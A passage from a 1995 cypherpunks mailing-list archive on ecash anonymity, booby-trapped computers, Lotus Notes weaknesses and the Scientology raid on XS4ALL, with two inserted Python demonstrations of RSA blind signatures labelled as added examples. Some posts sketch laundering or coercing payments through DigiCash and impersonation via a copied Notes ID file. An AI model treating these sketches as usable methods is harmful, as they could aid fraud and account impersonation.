the physical world it seems to me that anonymity will be difficult.  On
the net it is easier but man does not live by bits alone.

For me, protecting privacy is a difficult enough problem.  Transforming
the world into a libertarian/anarchist utopia is somebody else's job.

Hal

P.S. Without seeing the technical specs it is hard to describe in detail,
but generally Chaumian ecash allows fully anonymous coerced transfers.
The payee/coercer supplies the blinded coins and forces the payor to use
them to make withdrawals from his account.  The resulting signed
tokens are passed to the coercer who unblinds them and now has fully
anonymous, untraceable cash tokens which he can spend.
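
The blinding and unblinding steps this thread argues about (the "blinding factor" in Lucky Green's post, Bryce Wilcox's reply, and the P.S. above), as an added example that is not part of any of the original posts and is not DigiCash's code. It assumes textbook RSA blind signatures with a constructed toy key; the function names, account names and log layout are hypothetical. It shows that the bank's withdrawal log alone does not identify a coin, and that a payer who discloses the blinding factor lets the bank tie a deposited coin back to one withdrawal.

```python
import hashlib
import math
import secrets

# Constructed toy bank key: two Mersenne primes, far too small and too
# structured for real use. Chosen only so the example runs offline.
P, Q = 2**127 - 1, 2**89 - 1
N, E = P * Q, 65537
D = pow(E, -1, (P - 1) * (Q - 1))   # bank's private exponent


def coin_hash(serial: bytes) -> int:
    """Map a coin serial to an integer mod N (stand-in for real padding)."""
    return int.from_bytes(hashlib.sha256(serial).digest(), "big") % N


def new_blinding_factor() -> int:
    """Random r that is invertible mod N."""
    while True:
        r = secrets.randbelow(N - 2) + 2
        if math.gcd(r, N) == 1:
            return r


def blind(serial: bytes, r: int) -> int:
    """Payer side: hide the coin as H(serial) * r^E mod N before withdrawal."""
    return (coin_hash(serial) * pow(r, E, N)) % N


def bank_sign(blinded: int) -> int:
    """Bank side: sign whatever it is handed; it never sees the serial."""
    return pow(blinded, D, N)


def unblind(blind_sig: int, r: int) -> int:
    """Payer side: strip r, leaving an ordinary signature on H(serial)."""
    return (blind_sig * pow(r, -1, N)) % N


def verify(serial: bytes, sig: int) -> bool:
    """Anyone: check the bank's signature on a coin."""
    return pow(sig, E, N) == coin_hash(serial)


def link_deposit(serial: bytes, disclosed_r: int, withdrawal_log) -> list:
    """Bank side: with a disclosed blinding factor, recompute the blinded
    value and return the account(s) whose logged withdrawal matches it."""
    target = blind(serial, disclosed_r)
    return [acct for acct, blinded in withdrawal_log if blinded == target]


def demo() -> dict:
    withdrawal_log = []                   # (account, blinded value) as the bank sees it
    coins = {}
    for acct in ("payer-A", "payer-B"):   # constructed account names
        serial = secrets.token_bytes(16)
        r = new_blinding_factor()
        b = blind(serial, r)
        withdrawal_log.append((acct, b))
        coins[acct] = (serial, r, unblind(bank_sign(b), r))

    serial, r, sig = coins["payer-A"]     # the coin a payee later deposits
    return {
        "coin_verifies": verify(serial, sig),
        # The bank never logged the unblinded coin hash at withdrawal time.
        "bank_saw_coin_hash": any(b == coin_hash(serial) for _, b in withdrawal_log),
        # A blinding factor that does not belong to this coin links nothing.
        "linked_with_wrong_r": link_deposit(serial, coins["payer-B"][1], withdrawal_log),
        # The payer's own r ties the deposited coin to exactly one withdrawal.
        "linked_with_disclosed_r": link_deposit(serial, r, withdrawal_log),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The link only works because the payer hands over r; the bank's own records (blinded values at withdrawal, serials at deposit) share no common value it can match on.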




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Name Withheld by Request)
Date: Tue, 5 Sep 95 14:06:19 PDT
To: cypherpunks@toad.com
Subject: Re: SSLRef (SSLtelnet)
In-Reply-To: <199509050417.VAA05211@jobe.shell.portal.com>
Message-ID: <199509051940.VAA26244@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Hal (hfinney@shell.portal.com) wrote:

>I understand that Netscape's browser will also accept certificates
>created by a Netscape-internal "test" CA.  I hoped that perhaps some
>junk certificates from that CA might be floating around, ones which
>would be useless for conventional purposes because their secret keys
>are exposed, but which would be perfect for my needs.

Is it possible that since this was only a "test" CA, that netscape used
less than a full-strength key?  If it was only 512 bits or so, we could
try cracking it.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 5 Sep 95 21:31:51 PDT
To: cypherpunks@toad.com
Subject: Re: Are booby-trapped computers legal?
Message-ID: <ac7271110e021004e592@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:19 AM 9/6/95, Jim Choate wrote:

>> Thus, I suspect it is fully legal to build an electrified fence around
>> one's PC, providing suitable warnings are included.
>>
>
>As far as I know the owner of property has no legal right to kill a person
>either trespassing or stealing it in any of the 50 states. There was a
>recent federal ruling that basically says that if you meet a burglar in your
>home at night you can not kill or otherwise harm them unless your life is
>directly threatened. In short, you MUST give up the ground if at all
>possible. Federal and all 50 states (as far as I have been able to
>determine) rule human life to have an inherently higher value than property
>of any type (this does not apply to government institutions).

Well, I wasn't saying one had a legal right to kill a person either
trespassing or stealing, I was saying that electrified fences carrying
lethal voltages are extant. How they got that way, and what licenses are
involved, is unknown to me. But they do exist.

>In Texas and all other cattle states that I am aware of, there are specific
>laws that limit how much voltage and current capacity an electrified fence
>can have. These laws specifically prohibit any form of lethal installation.
>There is no license required nor do you have to mark the fences as electrified.

Cattle fences are not what I was talking about. I have an electrified fence
on one side of my property, to keep the deer away. Lethal voltage fences,
to keep humans out, are another matter.


....

>I don't know what you call it but if nothing else it is ethically and morally
>reprehensible.

Different strokes for different folks. Anyone entering my house unannounced
faces lethal response. I think of it as evolution in action, and doubt I
would lose any sleep over this.

It has nothing to do with equating human life over property, it has to do
with defending one's property and (maybe) one's life. Here in California,
it is becoming more and more common for "home invasions" to be followed by
execution of all of the witnesses. (Read "The San Jose Mercury News" for
accounts of gang invasions in which all the residents in a home are lined
up and shot, execution-style.)

I won't get into a discussion of which states permit lethal force
responses, as this is a topic which even I think belongs in
talk.politics.guns or similar fora.

Suffice it to say that most states allow lethal response under threatening
circumstances.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 5 Sep 95 18:55:45 PDT
To: cypherpunks@toad.com
Subject: Re: Forgery, bills, and the Four Horsemen  (Articles and Comment)
Message-ID: <199509060153.VAA14379@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199509052310.QAA10027@jobe.shell.portal.com>,
hfinney@shell.portal.com (Hal) wrote:

>This is not completely correct; there is a degree of anonymity in
>DigiCash's ecash.  That is anonymity of how a person spends his money.
>Neither the bank nor the payor is in a position to learn who or where a
>particular piece of ecash comes from (assuming that anonymous
>communication means are used).

So it is harder to compile dossiers on people. Big deal. The recipient can
still determine who gets the goods paid for by the "anonymous" ecash by
conventional means (hint: shipping address), so the payee anonymity is of
little value as far as protecting the privacy of the payer (most likely
the recipient of the goods) is concerned.

Ecash of course is of *no* value for the various assassination markets,
drug dealing, money laundering, etc that routinely get mentioned in the
same paragraph as Ecash. The reason is the *full traceability* of the
payee that has been deliberately built into the current version of Ecash.
A "feature" that you may rest assured will be part of all future versions
backed by anyone with even marginal reputation in the financial markets.

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMEz/CyoZzwIn1bdtAQErdwGA3TrIYF5+O1EOQ+qdCyZRo8ePJnxmAAAl
EeES8xBtWDBFwqUXTFRbj1hqLv9kwQ6K
=7w8Q
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tweetpunk@aol.com
Date: Tue, 5 Sep 95 19:14:05 PDT
To: cypherpunks@toad.com
Subject: Key Certification by US Post Office
Message-ID: <950905221353_11856933@mail02.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Copious apologies if this is old news, but I just got a chance to read some
mags from the last few weeks:

An article in *The Economist* (August 5th-11th 1995 p56) reports that the
United States Postal Service has plans to offer *electronic certificates of
identity encoded to prevent forgery*.
It goes on to say that they are working with the usual suspects (Microsoft
and Lotus/IBM) to get appropriate software included in their products. 

Future services include timestamping, multimedia kiosks in post office
lobbies and e-mail print out and delivery services (for the connectivity
challenged).

I guess this puts a new twist on saying that PGP is an envelope for your
e-mail.

-------
Greg Anders
tweetpunk@aol.com

To have loved and lost liked Patsy Cline, it is better to have never loved at
all.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Tue, 5 Sep 95 22:34:46 PDT
To: Jim Choate <ravage@einstein.ssz.com>
Subject: Re: Are booby-trapped computers legal?
In-Reply-To: <199509060419.XAA04296@einstein.ssz.com>
Message-ID: <Pine.SUN.3.91.950905220511.3325B-100000@crl3.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Tue, 5 Sep 1995, Jim Choate wrote:

> . . . federal ruling that basically says that if you meet a burglar in your
> home at night you can not kill or otherwise harm them unless your life is
> directly threatened. In short, you MUST give up the ground if at all
> possible. . . . 

Citation please.  Killing is usually a state matter.  I doubt
there was any such federal ruling.

In California, there is a legal presumption that anyone who
illegally enters an occupied dwelling, at night, is a threat
to life or great bodily harm.  You may, therefore, use deadly
force without further evidence.  (This means you can shoot 'em
in the back if you want.)

Now back to the booby-trapped computer thread:

I think it would be better to have your booby-trap kill your 
data, not the nice men in the nomex ski masks.  While those folks
might take a dim view of the former, they most certainly
would take extreme umbrage at the latter.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Tue, 5 Sep 95 19:33:24 PDT
To: jsimmons@goblin.punk.net
Subject: Re: NSA says Joe Sixpack won't buy crypto
Message-ID: <80607.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


  Black Unicorn <unicorn@access.digex.net>  writes:
> On Tue, 5 Sep 1995, Jeff Simmons wrote:
>>   So what form of GAK or trap-door does lotus notes contain?
> No, it's just been so weak before the current implementation of RC4 (and
> note the export version still has 40 bits) that it might as well be
> nothing.

Uni is right. Notes used RSA, which starts out fine, but it has
nothing like PGP's passphrase to protect the private key. You can
simply copy the "username.ID" file, and you can sign and encrypt
messages with "username"'s nym.

Of course, corporate America loves Notes, which is why IBM bought it.

Weak encryption for weak minds.

Pat

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven Calabro <kensington@earthlink.net>
Date: Wed, 6 Sep 95 18:31:17 PDT
Subject: Symbols on the net :)
Message-ID: <42ijlr$rff@mars.earthlink.net>
MIME-Version: 1.0
Content-Type: text/plain


If you know of any symbols or acronyms used on the net, please mail them   
to me. 
 
Thanks





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu>
Date: Tue, 5 Sep 95 21:42:46 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: Re: Forgery, bills, and the Four Horsemen (Articles and Comment)
In-Reply-To: <v02120d0bac72d46f9337@[192.0.2.1]>
Message-ID: <199509060442.WAA08575@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

I, Bryce Wilcox <bryce.wilcox@colorado.edu> wrote:
> 
> >I hope I'm not missing anything here.


shamrock@netcom.com (Lucky Green) wrote:
>
> Only that Ecash has no benefits for transactions that are of an illegal
> nature. The meaning of "illegal" is of course increasing as new laws are
> passed every session of the legislature.


Chaum says that (especially when speaking before U.S. Congress) but I think
he is playing both sides of the fence.  He is a die-hard privacy advocate who
allegedly turns down lucrative business deals because he feels they would
dilute his privacy achievements.  The truth is that Chaumian DigiCash is a
*lot* safer for criminals than, say, credit cards, and when it is combined
with the other tools in a money launderer's toolbox, I expect it will be a
great boon to them.


Suppose you have acquired a million dollars worth of legal, above-board
DigiCash dollars and you want to surreptitiously transfer this wealth to a
below-board friend.  Your friend creates a temporary anonymous account at an
understanding bank.  You just use a lot of small denominations to squirt the
dollars to your friend's account.  Then he squirts them to his real accounts
and destroys the blinding factors that the temporary anon account used.


Now without active physical surveillance, nobody other than yourself and your
friend will ever know where the money went, and you can't prove that you gave
it to him, either...


I hope no bloodthirsty mob bosses or statist legislators are reading this...


Bryce

signatures follow:


                                 +                                           
    public key on keyservers     /.       island Life in a chaos sea         
    or via finger 0x617c6db9     /             bryce.wilcox@colorado.edu     
                                 ---*                                     

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta3

iQCVAwUBME0mG/WZSllhfG25AQES6AP9H6wluOOoUKpN92hiVSrwrig4dKoRbPJt
d7ROsrQUyx5OXBZXRxyrQvY3z/Qd4ytHXpoKAfpizGwAClqFubZ/OcRxTyiAudgG
0mA+dd9nHYPswAyVFmLk9rqkv3AIO3Ikq8uunh4KkUx72rmZf62G8+N4nkR7TKZP
/E+1PDmuPzI=
=wvSK
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 5 Sep 95 22:57:13 PDT
To: Black Unicorn <unicorn@access.digex.net>
Subject: Re: Growth of actions definded as crime. Which math formula?
Message-ID: <v02120d0fac72f40a1ca9@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 23:56 9/5/95, Black Unicorn wrote:
>
>Really it's hard to answer this because what constitutes a "NEW" act is a
>real question in and of itself.
>
>For example, wire fraud.  Is it a "NEW" crime?  Or just a subset of
>fraud, or mail fraud?

If the guy would have gotten away before the new law was passed, it is a
new crime.

That's the stats I am looking for.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 5 Sep 95 22:57:11 PDT
To: cypherpunks@toad.com
Subject: Non-Delivery Notification
Message-ID: <v02120d10ac72f49d3f4d@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


What is this shit? Got about ten today.

--- begin forwarded text

From: sysop@dkmail.dkeep.com
To: shamrock@netcom.com
Subject: Non-Delivery Notification
Organization: Dragon Keep (904) 375-3500
Date: Wed, 06 Sep 95 00:05:41 EST


     NON-DELIVERY NOTICE
     -------------------

The message you sent on:

Unknown to -unknown was undeliverable.

========================= !!! Automated Notice !!! =======================
 E-mail replies to this user should have the following on the first line
 of message text:        TO: -unknown
==========================================================================

--- end forwarded text


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 5 Sep 95 22:57:17 PDT
To: Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu>
Subject: Re: Forgery, bills, and the Four Horsemen (Articles and Comment)
Message-ID: <v02120d11ac72f4de4e9a@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 22:42 9/5/95, Bryce Wilcox wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>I, Bryce Wilcox <bryce.wilcox@colorado.edu> wrote:
>>
>> >I hope I'm not missing anything here.
>
>
>shamrock@netcom.com (Lucky Green) wrote:
>>
>> Only that Ecash has no benefits for transactions that are of an illegal
>> nature. The meaning of "illegal" is of course increasing as new laws are
>> passed every session of the legislature.
>
>
>Chaum says that (especially when speaking before U.S. Congress) but I think
>he is playing both sides of the fence.  He is a die-hard privacy advocate who
>allegedly turns down lucrative business deals because he feels they would
>dilute his privacy achievements.  The truth is that Chaumian DigiCash is a
>*lot* safer for criminals than, say, credit cards, and when it is combined
>with the other tools in a money launderer's toolbox, I expect it will be a
>great boon to them.

Chaum is a privacy advocate when it comes to companies compiling dossiers on
you. When it comes to criminal use, my conversations with Chaum, his public
comments, and last not least the current implementation of his software
suggest otherwise.

>
>Suppose you have acquired a million dollars worth of legal, above-board
>DigiCash dollars and you want to surreptitiously transfer this wealth to a
>below-board friend.  Your friend creates a temporary anonymous account at an
>understanding bank.  Y

Won't work. Ecash, except as used for frequent flyer like points, will
exist in only *one* world wide e$ currency, issued by a single entity
composed of various major banks and subject to US laws. Getting Ecash
accounts will therefore be subject to the same legal requirements that
apply to normal US checking accounts.

>Now without active physical surveillance, nobody other than yourself and your
>friend will ever know where the money went, and you can't prove that you gave
>it to him, either...

You or a sting operation can always reveal the recipient by publishing the
blinding factor. Besides, your Ecash client keeps a log of the payees.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
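
Added example (not part of the original message, and not DigiCash's code): a textbook RSA blind signature illustrating the claim above, that the bank cannot link a withdrawal to a deposit from its own logs, while the payer can do so by disclosing the blinding factor. The toy key, account names and coin serials are constructed, and the hash-then-sign coin format is an assumption.

```python
import hashlib
import math
import secrets

# Constructed toy bank key (two Mersenne primes). Illustration only.
P, Q = 2**61 - 1, 2**89 - 1
N, E = P * Q, 65537
D = pow(E, -1, (P - 1) * (Q - 1))  # bank's private exponent


def h(serial: bytes) -> int:
    """Map a coin serial number into Z_N (assumed coin format)."""
    return int.from_bytes(hashlib.sha256(serial).digest(), "big") % N


def new_blinding_factor() -> int:
    """Random r that is invertible mod N."""
    while True:
        r = secrets.randbelow(N - 2) + 2
        if math.gcd(r, N) == 1:
            return r


def blind(serial: bytes, r: int) -> int:
    return (h(serial) * pow(r, E, N)) % N      # payer side


def bank_sign(blinded: int) -> int:
    return pow(blinded, D, N)                  # bank never sees the serial


def unblind(blind_sig: int, r: int) -> int:
    return (blind_sig * pow(r, -1, N)) % N     # payer side


def verify(serial: bytes, sig: int) -> bool:
    return pow(sig, E, N) == h(serial)


class Bank:
    def __init__(self):
        self.withdrawals = []  # (account, blinded value)
        self.deposits = []     # (account, serial, signature)

    def withdraw(self, account, blinded):
        self.withdrawals.append((account, blinded))
        return bank_sign(blinded)

    def deposit(self, account, serial, sig):
        spent = any(s == serial for _, s, _ in self.deposits)
        if spent or not verify(serial, sig):
            return False       # double spend or bad signature
        self.deposits.append((account, serial, sig))
        return True


def explaining_factor(blinded: int, serial: bytes) -> int:
    """The r' under which `blinded` would be the blinding of `serial`.
    One exists for every (withdrawal, coin) pair."""
    return pow(blinded * pow(h(serial), -1, N) % N, D, N)


def bank_can_link(bank: Bank) -> bool:
    """True only if the logs alone rule out some withdrawal for some coin."""
    for _, serial, _ in bank.deposits:
        for _, b in bank.withdrawals:
            if blind(serial, explaining_factor(b, serial)) != b:
                return True
    return False


def trace_payee(bank: Bank, payer_account, serial: bytes, r: int):
    """Payer discloses (serial, r): the withdrawal is tied to the deposit."""
    if (payer_account, blind(serial, r)) not in bank.withdrawals:
        return None            # disclosure matches no withdrawal by this payer
    for account, s, _ in bank.deposits:
        if s == serial:
            return account
    return None


def demo():
    bank = Bank()
    s_a, r_a = b"coin-serial-A", new_blinding_factor()
    s_c, r_c = b"coin-serial-C", new_blinding_factor()
    sig_a = unblind(bank.withdraw("alice", blind(s_a, r_a)), r_a)
    sig_c = unblind(bank.withdraw("carol", blind(s_c, r_c)), r_c)
    ok = bank.deposit("bob", s_a, sig_a) and bank.deposit("dave", s_c, sig_c)
    return {
        "coin_valid": ok,
        "double_spend_rejected": not bank.deposit("eve", s_a, sig_a),
        "bank_can_link": bank_can_link(bank),
        "traced": trace_payee(bank, "alice", s_a, r_a),
        "wrong_factor": trace_payee(bank, "alice", s_a, r_c),
    }


if __name__ == "__main__":
    print(demo())
```

Every withdrawal is consistent with every deposited coin until a payer reveals her own (serial, r) pair, at which point the depositing account is identified.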






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chen@intuit.com (Mark Chen)
Date: Tue, 5 Sep 95 22:59:41 PDT
To: adam@bwh.harvard.edu (Adam Shostack)
Subject: Re: Crypto '95
In-Reply-To: <199509021859.OAA02093@bwh.harvard.edu>
Message-ID: <9509060553.AA08998@doom.intuit.com>
MIME-Version: 1.0
Content-Type: text/plain



> 	The best talks were probably by Ross Anderson (Robustness
> Principles for Public Key Protocols) and Adi Shamir (Myths and
> Realities of Cryptography).

One interesting aspect of Anderson's result is that it decisively
breaks X.509 (he shows how to forge signatures in
encrypt-before-signing protocols by computing a discrete log over the
RSA modulus).  I strongly recommend the paper.


--
Mark Chen 
chen@intuit.com
415/329-6913
finger for PGP public key
D4 99 54 2A 98 B1 48 0C  CF 95 A5 B0 6E E0 1E 1D



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alt@iquest.net (Al Thompson)
Date: Tue, 5 Sep 95 21:12:02 PDT
To: mail2news@utopia.hacktic.nl
Subject: Re: SUMMARY: Not-so-volatile volatile memory
Message-ID: <m0sqBq5-00063yC@dorite1.iquest.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:54 AM 9/5/95 +0200, Anonymous wrote:
>
>Is this a new discovery?  When I used to work with DOD classified
>data, not so long ago, disk drives had to be declassified using an
>approved program, such as Norton Utilities' "WIPEINFO".  (That was
>approved up through the SECRET/SAR level, anyway.  I don't know
>about TS/SCI/SI.)  But those same regulations said that RAM was
>considered declassified within a certain time (30 seconds, I think)
>after power was removed.  (That time figure was UNclassified, BTW.)
>I think it was just to allow time for the voltage to bleed off of
>the power supply's filter capacitors, and not related to the
>relative volatility of DRAM.
  
I worked at a DoD contractor for a while, and there was a DoD-approved 
method of disposing of hard drives, which was expensive, laborious,
and rather silly.
 
We just had two witnesses watch as we smashed it to smithereens 
(technical term) with a sledge hammer, and then handed the parts over
to an approved disposal person (trash man).
 
It's JUST that easy.
 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: michaelb@primenet.com (Michael Bredimus)
Date: Tue, 5 Sep 95 23:01:57 PDT
To: cypherpunks@toad.com
Subject: Re: Are booby-trapped computers legal?
Message-ID: <199509060601.XAA08779@mailhost.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:43 PM 9/5/95 -0700, Timothy C. May wrote:
<snip>
>>As far as I know the owner of property has no legal right to kill a person
>>either trespassing or stealing it in any of the 50 states. There was a
>>recent federal ruling that basically says that if you meet a burglar in your
>>home at night you can not kill or otherwise harm them unless your life is
>>directly threatened. In short, you MUST give up the ground if at all
>>possible. Federal and all 50 states (as far as I have been able to
>>determine) rule human life to have an inherently higher value than property
>>of any type (this does not apply to government institutions).
>
<snip>

The laws regarding the use of deadly force against an unarmed burglar in
one's home vary from state to state.  In Massachusetts, for example, a
homeowner has a DUTY to retreat from his own home before employing deadly
force against an intruder.

In Arizona, however, we prefer a much different approach.

13-411.  Justification; use of force in crime prevention

A.  A person is justified in threatening or using both physical force and
deadly physical force against another if and to the extent the person
reasonably believes that physical force or deadly physical force is
immediately necessary to prevent the other's commission of ... burglary in
the second or first degree under section 13-1507 ...


13-1507.  Burglary in the second degree; classification

A.  A person commits burglary in the second degree by entering or remaining
unlawfully in or on a residential structure with the intent to commit any
theft or any felony therein.



michaelb@primenet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: announce <announce@xs4all.nl>
Date: Tue, 5 Sep 95 14:10:25 PDT
To: cypherpunks@toad.com
Subject: Scientology and police visit XS4ALL Amsterdam
Message-ID: <199509052109.AA16923@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text



From: XS4ALL Internet
      Postbus 22864
      1100 DJ  Amsterdam
      tel: +31 20 6222885
      fax: +31 20 6222753


        PRESS RELEASE
        -------------


    Police and members of Scientology church enter offices of XS4ALL
    ================================================================

Amsterdam - Tuesday, September 5, 1995.

Today at about 14:00, XS4ALL was visited by Mr. S. Braan,
bailiff. He was acting on behalf of the Religious
Technology Centre, better known as the Scientology Church, or
Scientology for short. He was assisted by a local police officer and Mr.
Hermans from the 'Nauta-Dutilh' legal firm that represents Scientology
in The Netherlands. Also present were two computer experts (Mr. Ootjes
and Mr. Van Suchtelen) a locksmith (to enter had we not been present) and
two American employees of Scientology, Mr. Weightman and Ms. Jenssen.

Scientology is filing for seizure of XS4ALL's computer equipment. Under
Dutch law, this means that a bailiff comes in to record your assets. In
real-life, the computer-experts that were present have recorded the
types and serial numbers of all the computers in our offices. They did
not take any equipment, the continuity of XS4ALL's services is not in
jeopardy.


What is this all about?
-----------------------

The Scientology Church claims that the XS4ALL anonymous remailer was used
to disseminate documents over the Internet to which the church holds the
legal copyright. This has led the church to ask the president of the
district court of Amsterdam to grant permission for this seizure as a
prelude to legal procedures concerning damages suffered by the church.
The remailer in question was disabled more than 2 months ago.

During the visit of Scientology to XS4ALL this afternoon, the remailer
was not the subject of any conversation. The organisation seemed totally
preoccupied with the information about Scientology that one of our users
has put on his home page. Part of this information is said to be a file
to which Scientology holds the copyright. If we were to delete the file
in question on the spot, they were willing to drop the seizure.


Responsibility of Internet Providers
------------------------------------

XS4ALL categorically denies any responsibility for contents of users'
homepages. The users decide for themselves what is on their homepage.
Since XS4ALL does not edit the homepages and has no mechanism of
control over the contents we strongly feel that the users themselves are
responsible for what they say on their homepage.

This whole affair demonstrates the need for clarity concerning the legal
position of Internet Providers. We are shocked that our offices can be
invaded by freshly flown-in U.S. cult members. If we as Internet
providers are held responsible for what our users say, that will
undoubtedly kill freedom of speech on the net.


Scare-tactics
-------------

XS4ALL is not alone in receiving this kind of attention from
Scientology. Scientology, a semi-religious multinational, is at war with
a number of people on the Internet. A non-organized group of people on
the net has started to openly discuss the activities of the church.
Until recently, the church has always managed to suppress critical voices
by means of sheer intimidation and by engaging in endless legal battle.

One of the people that Scientology has a problem with is 'fonss', an
XS4ALL user that publishes the F.A.C.T.-net Kit on his home page
(http://www.xs4all.nl/~fonss). This kit (which can be found on numerous
homepages all over the Internet) consists of a large number of documents
that show the true face of Scientology.

One of these documents is a piece to which Scientology supposedly holds
the copyright and which has been added to the kit without the church's
permission.



Additional information can be found on the Internet:

http://www.cybercom.net/~rnewman/scientology/home.html
http://www.xs4all.nl/~fonss
news:alt.religion.scientology
news:alt.censorship
news:alt.clearing.technology




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 5 Sep 95 23:15:31 PDT
To: Black Unicorn <unicorn@access.digex.net>
Subject: Re: Growth of actions definded as crime. Which math formula?
Message-ID: <v02120d13ac72fb4a20f8@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:00 9/6/95, Black Unicorn wrote:

>> If the guy would have gotten away before the new law was passed, it is a
>> new crime.
>
>This is very rare.  It's mostly in definitional cases, for example, where
>Ecstasy was just not defined as a controlled substance some years ago.
>
>Created crimes are few and far between.

Excuse my ignorance, but it just begs the question. Why then all the new
laws? Just to twist the penalty screw another turn?

Confused,


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 5 Sep 95 21:14:42 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Are booby-trapped computers legal?
In-Reply-To: <ac7263200d0210049f0b@[205.199.118.202]>
Message-ID: <199509060419.XAA04296@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



> 
> There are two types of "booby traps" to consider:
> 
> * Type 1 Booby Trap: a shotgun is placed inside a home, set to fire if and
> when a burglar enters. Or an electrified region of a room is set to "get
> energized" when an intruder enters. These are "surprises" and are canonical
> booby traps.
> 
> These have been found to be illegal in several court cases. (I'm not a
> lawyer, but I've been reading about them for 20 years. Famous cases where a
> burglar sued, and won, because he was injured when breaking into a house.)
> 

These are completely illegal in Texas and Florida for sure. To make such
devices legal the state legal system has to equate property value to parity
with life. See below for further comment on this.

> * Type 2 Booby Trap: electrified perimeter fences. So long as these are
> adequately marked ("If you touch this fence, you will probably die"), and
> are not public nuisances where children and pets will inadvertently
> validate Darwin's theory, these are--I think--legal. There may be license
> fees required, to build an electrified fence, but I think it is possible to
> build a lethal voltage electrified fence on one's property.
> 
> Thus, I suspect it is fully legal to build an electrified fence around
> one's PC, providing suitable warnings are included.
> 

As far as I know the owner of property has no legal right to kill a person
either trespassing or stealing it in any of the 50 states. There was a
recent federal ruling that basically says that if you meet a burglar in your
home at night you can not kill or otherwise harm them unless your life is
directly threatened. In short, you MUST give up the ground if at all
possible. Federal and all 50 states (as far as I have been able to
determine) rule human life to have an inherently higher value than property
of any type (this does not apply to government institutions).

In Texas and all other cattle states that I am aware of, there are specific
laws that limit how much voltage and current capacity an electrified fence
can have. These laws specifically prohibit any form of lethal installation.
There is no license required nor do you have to mark the fences as electrified.

To address the issue of premeditation in regards to this sort of system,
does attempted murder ring any bells? If the officer(s) have warrants (and
it is not up to the accused to decide that issue at any time) and you
